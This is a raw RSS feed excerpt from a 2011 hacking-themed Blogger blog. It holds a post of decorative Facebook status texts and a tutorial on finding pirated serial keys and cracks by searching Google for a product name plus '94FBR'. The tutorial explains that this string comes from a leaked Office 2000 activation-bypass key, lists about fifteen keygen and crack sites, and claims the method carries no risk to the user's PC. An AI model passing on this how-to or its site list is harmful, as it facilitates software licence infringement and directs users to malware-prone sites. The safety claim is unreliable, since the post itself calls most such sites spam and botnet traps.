&lt;i&gt;&lt;span class="st"&gt;&lt;span style="color: #351c75;"&gt;Good Luck !! Share it :)&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdu9xl5x6zEt6nlgDUqZLtZcxd1MMad7BsqyhwVQvJVMCxblMQL47RoqJYTIMF0ISvkhMLRImHkykVvywtqsJGxnVTBBGDm-2kTG1xilzrG0vF7eodZTX3agBdbej3xXl4q4sgPtO_3rfS/s1600/ethical2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdu9xl5x6zEt6nlgDUqZLtZcxd1MMad7BsqyhwVQvJVMCxblMQL47RoqJYTIMF0ISvkhMLRImHkykVvywtqsJGxnVTBBGDm-2kTG1xilzrG0vF7eodZTX3agBdbej3xXl4q4sgPtO_3rfS/s320/ethical2.jpg" width="275" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div&gt;&lt;span class="st"&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelPDuM7fYq9RoUxbQ157ycj4hyKNJ3fyDWtxT68jcbjBZsZaZ4u2TxVsjqbTLnkvwvcmCTxYypXEYFjbgOx-Wno7vPqnDxdq1-YnGSAwzOHtgqw1nyD8v1TtDMFJnGiZrQ8aCqZ8qQGK3/s72-c/ethical.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Facebook Animated Status</title><link>http://hackrich.blogspot.com/2011/11/facebook-animated-status.html</link><category>Facebook</category><category>Facebook Animated Gif Image Status</category><category>Facebook Emoticons</category><category>facebook symbols</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sun, 20 Nov 2011 11:36:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-6495786217213728937</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b style="color: #674ea7;"&gt;&lt;span style="font-size: x-large;"&gt;&amp;nbsp;► Facebook Animated Status ►&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #351c75;"&gt;Status Text Effect And Animations - this allows you to add special text characters and text effects to your facebook status updates share it with ur friends :)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #674ea7; font-size: large;"&gt;&lt;b&gt;Post 1►&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h2 class="uiHeaderTitle"&gt;&lt;/h2&gt;&lt;div class="uiHeader uiHeaderBottomBorder mbm"&gt;&lt;div class="clearfix uiHeaderTop"&gt;&lt;div class="uiHeaderActions rfloat"&gt;&lt;/div&gt;&lt;div&gt;&lt;h2 class="uiHeaderTitle"&gt;► [̲̅G̲̅][̲̅o̲̅][̲̅o̲̅][̲̅d̲̅] [̲̅m][̲̅o][̲̅r][̲̅n][̲̅i][̲̅n][̲̅g] ◄&lt;/h2&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="clearfix"&gt;&lt;div class="mbs uiHeaderSubTitle lfloat fsm fwn fcg"&gt;by &lt;a href="http://www.facebook.com/hackrich"&gt;Hackrich&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&amp;nbsp;&lt;img src="http://a1.sphotos.ak.fbcdn.net/hphotos-ak-snc3/27977_126216480723638_123901794288440_321574_5710742_n.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;╔═════════&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;═&lt;/b&gt;&lt;b&gt;══════&lt;/b&gt;&lt;b&gt;══════&lt;/b&gt;&lt;b&gt;═════╗&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;►&lt;/b&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; http://www.facebook.com/Hackrich&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;b&gt;◄&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;╚═════&lt;/b&gt;&lt;b&gt;══════════&lt;/b&gt;&lt;b&gt;══════════&lt;/b&gt;&lt;b&gt;════════╝ &lt;/b&gt;&lt;br /&gt;
&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt; &amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;br /&gt;
&lt;i&gt;Every morning you have two choices, continue ur sleep with dreams or WAKE UP and chase ur dreams. CHOICE IS YOURS. GOOD MORNING&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;▬▬▬•Share wid Ur Frnds•▬▬▬&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;http://www.facebook.com/Hackrich&lt;/b&gt;&lt;br /&gt;
&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #351c75;"&gt;&lt;a href="http://www.facebook.com/note.php?note_id=323178844365628" target="_blank"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;span class="UIActionLinks UIActionLinks_bottom" data-ft="{&amp;quot;type&amp;quot;:&amp;quot;20&amp;quot;}"&gt;♥ Share it ♥&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;span class="UIActionLinks UIActionLinks_bottom" data-ft="{&amp;quot;type&amp;quot;:&amp;quot;20&amp;quot;}"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b style="color: #20124d;"&gt;Link to share ►&lt;/b&gt; &lt;textarea cols="20" rows="5"&gt;http://www.facebook.com/note.php?note_id=323178844365628&lt;/textarea&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #674ea7;"&gt;&lt;span style="font-size: large;"&gt;Post 2 ►&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;h2 class="uiHeaderTitle"&gt;♥ Michael Jackson ♥ chk it out.. ▼▼&lt;/h2&gt;&lt;/div&gt;&lt;div class="clearfix"&gt;&lt;div class="mbs uiHeaderSubTitle lfloat fsm fwn fcg"&gt;by &lt;a href="http://www.facebook.com/hackrich"&gt;Hackrich&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&amp;nbsp;&lt;img src="http://a7.sphotos.ak.fbcdn.net/hphotos-ak-snc3/27977_126227320722554_123901794288440_321627_1268031_n.jpg" /&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt; &amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&amp;nbsp; Michael Jackson,&amp;nbsp; &amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt; one of the most widely beloved entertainers and  profoundly influential artists of all-time,&amp;nbsp; &amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp; leaves an indelible imprint  on popular music and culture... &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;br /&gt;
&lt;b&gt;╔═════════&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;═&lt;/b&gt;&lt;b&gt;═&lt;/b&gt;&lt;b&gt;═══&lt;/b&gt;&lt;b&gt;═══&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;══════&lt;/b&gt;&lt;b&gt;═════╗&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;►&lt;/b&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; http://www.facebook.com/Hackrich&lt;/b&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&lt;b&gt; &lt;/b&gt;&lt;b&gt;◄&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;╚═════&lt;/b&gt;&lt;b&gt;══════════&lt;/b&gt;&lt;b&gt;═════&lt;/b&gt;&lt;b&gt;═══&lt;/b&gt;&lt;b&gt;═════&lt;/b&gt;&lt;b&gt;════════╝ &lt;/b&gt;&lt;br /&gt;
&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;br /&gt;
&lt;b&gt;▬▬▬•Share wid Ur Frnds•▬▬▬&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;http://www.facebook.com/Hackrich&lt;/b&gt;&lt;br /&gt;
&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;FEEL FREE TO SHARE ANY POST BY CLICKING THE SHARE BUTTON :)&lt;br /&gt;
&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://a8.sphotos.ak.fbcdn.net/hphotos-ak-snc3/27977_126216220723664_123901794288440_321571_5277661_n.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;img src="https://s-static.ak.facebook.com/rsrc.php/v1/yZ/r/mxGqrBaOCjA.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #674ea7; font-size: large;"&gt;&lt;b&gt;&lt;span class="UIActionLinks UIActionLinks_bottom" data-ft="{&amp;quot;type&amp;quot;:&amp;quot;20&amp;quot;}"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.facebook.com/note.php?note_id=323647774318735" target="_blank"&gt;►share it &lt;/a&gt;►&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #20124d;"&gt;Link to share ►&lt;/b&gt;&lt;textarea cols="20" rows="5"&gt;http://www.facebook.com/note.php?note_id=323647774318735&lt;/textarea&gt;&lt;br /&gt;
&lt;br /&gt;
Post 3 ►&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #674ea7; font-size: large;"&gt;&lt;b&gt;&lt;span class="UIActionLinks UIActionLinks_bottom" data-ft="{&amp;quot;type&amp;quot;:&amp;quot;20&amp;quot;}"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs286.snc3/27977_126276450717641_128355057212158_321786_7846603_n.jpg" /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs617.snc3/32461_391418849674_128355057212158_3772275_3366524_n.jpg" /&gt;&lt;br /&gt;
&lt;b&gt;▬▬▬•Share wid Ur Frnds•▬▬▬&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;The act of love . . . is a confession. Selfishness screams aloud, vanity shows off, or else true generosity reveals itself.&lt;/i&gt;&lt;br /&gt;
&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;br /&gt;
&lt;b&gt;╔═════════&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;══&lt;/b&gt;&lt;b&gt;═════╗&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;►&lt;/b&gt;&lt;a href="http://hackrich.blogspot.com/" rel="nofollow" target="_blank"&gt;http://Hackrich.blogspot.com&lt;/a&gt;&lt;b&gt; ◄&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;╚═════&lt;/b&gt;&lt;b&gt;═══&lt;/b&gt;&lt;b&gt;═══&lt;/b&gt;&lt;b&gt;═══════╝ &lt;/b&gt;&lt;br /&gt;
&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;i&gt;Love is hard to get into, but even harder to get out of. &lt;/i&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.facebook.com/Hackrich&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&lt;img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs276.snc3/27977_126236287388324_128355057212158_321681_7075191_n.jpg" /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zfd62yQDhCg.gif" /&gt;&lt;img src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/frIEl8ar7cK.gif" /&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs286.snc3/27977_126221767389776_128355057212158_321592_6755292_n.jpg" /&gt;&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;a href="http://www.facebook.com/note.php?note_id=325662820783897" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b style="color: #674ea7;"&gt;♥ Share it ♥ &lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #20124d; font-size: large;"&gt;&lt;b&gt;Link to share ►&lt;/b&gt;&lt;/span&gt;&lt;textarea cols="20" rows="5"&gt;http://www.facebook.com/note.php?note_id=325662820783897&lt;/textarea&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #674ea7; font-size: large;"&gt;&lt;b&gt;&lt;span class="UIActionLinks UIActionLinks_bottom" data-ft="{&amp;quot;type&amp;quot;:&amp;quot;20&amp;quot;}"&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Find Serial keys OR cracks 4 any software or game</title><link>http://hackrich.blogspot.com/2011/10/find-serial-keys-or-cracks-4-any.html</link><category>Google Dork</category><category>Google Hacks</category><category>Hacking Tutorials</category><category>serial keys 94fbr</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 29 Oct 2011 14:22:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-6184814664214617743</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHYKYuzWaRrkLXOk7-ILCUUX2Mvna7pCXzEqgb_V_PcVc_RjJgZz7obZt2H6S8l8_-IHikzRRFJaU714UjVw9d36CXEzYF8e4_9rqXa2wsPneJ9OACBsVz5QXObg7_SX8Mh1K4SvnymBV/s1600/google-hacks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHYKYuzWaRrkLXOk7-ILCUUX2Mvna7pCXzEqgb_V_PcVc_RjJgZz7obZt2H6S8l8_-IHikzRRFJaU714UjVw9d36CXEzYF8e4_9rqXa2wsPneJ9OACBsVz5QXObg7_SX8Mh1K4SvnymBV/s320/google-hacks.jpg" width="213" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;There is a vast number of websites out there, where you can find serial numbers and cracks for any program,&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt; but most of them aren't safe to use.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Bot-net army.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;In this post I will show you the most efficient way of downloading cracks and serial numbers without any risk to your PC. This is the part of Hacking/Cracking using "&lt;b&gt;Google hacking&lt;/b&gt;".&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;&lt;b&gt;Google hacking means&lt;/b&gt; how you can search all desired information using some Google searching tricks.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #660000; font-size: large;"&gt;&lt;b&gt;Finding Serial Key using Google :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;To Get the serial number from google you have to just follow these steps :&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;1)&lt;/b&gt;&lt;/span&gt; Go to Google.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;2)&lt;/b&gt;&lt;/span&gt; In the search field type : &lt;b&gt;"Software name" 94FBR&lt;/b&gt;&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;* Where, "Software Name" is the name of the item you want to find the serial number for.&lt;/span&gt;&lt;br /&gt;
* &lt;span style="color: #351c75;"&gt;For example &lt;span style="color: #674ea7;"&gt;"Photoshop 7" 94FBR&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;3)&lt;/b&gt;&lt;/span&gt; Now in search results, You will find sort list of websites where you can get product key.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpJjlVFtp00kWA2UMTLiLNTxF-iWar3tpYGQomZbM0pqLD9skyNTzmmmdTSin2J5HaZPfZAnjjxpS8brA4lLzKwZr49JqVE1HSu7HeZ-tj9fEqAsPfkPR1AQyXZhw0zMuHT0hV9iYFEcTt/s1600/ggoo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpJjlVFtp00kWA2UMTLiLNTxF-iWar3tpYGQomZbM0pqLD9skyNTzmmmdTSin2J5HaZPfZAnjjxpS8brA4lLzKwZr49JqVE1HSu7HeZ-tj9fEqAsPfkPR1AQyXZhw0zMuHT0hV9iYFEcTt/s400/ggoo.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #660000; font-size: large;"&gt;&lt;b&gt;HOW DOES THIS WORK ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Quite simple really. &lt;b&gt;94FBR&lt;/b&gt; is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;By searching for the product name and &lt;b&gt;94fbr&lt;/b&gt;, the pages that are returned are pages dealing specifically with the product you're searching a serial for.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;&lt;b style="color: #660000;"&gt;&lt;span style="font-size: large;"&gt;List of&amp;nbsp; Serials Search Engines:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #20124d;"&gt;&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.keygenguru.com/"&gt;www.keygenguru.com&lt;/a&gt;&amp;nbsp; &lt;/b&gt;&lt;div style="color: #20124d;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.serials.ws/"&gt;www.serials.ws&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.keygen.in/"&gt;www.keygen.in&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.smartserials.com/"&gt;www.smartserials.com&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: #20124d;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.serialkey.net/"&gt;www.serialkey.net&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.zcrack.com/"&gt;www.zcrack.com&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.subserials.net/"&gt;www.subserials.net&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.serialportal.com/"&gt;www.serialportal.com&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://supercracks.net/"&gt;supercracks.net&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.serialcrackz.com/"&gt;www.serialcrackz.com&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.serials.be/"&gt;www.serials.be&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.cracktop.com/"&gt;www.cracktop.com&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;* &lt;/span&gt;&lt;a href="http://www.cracksfm.com/"&gt;www.cracksfm.com&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.cracklib.net/"&gt;www.cracklib.net&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.crackdb.org/"&gt;www.crackdb.org&lt;/a&gt;&lt;br /&gt;
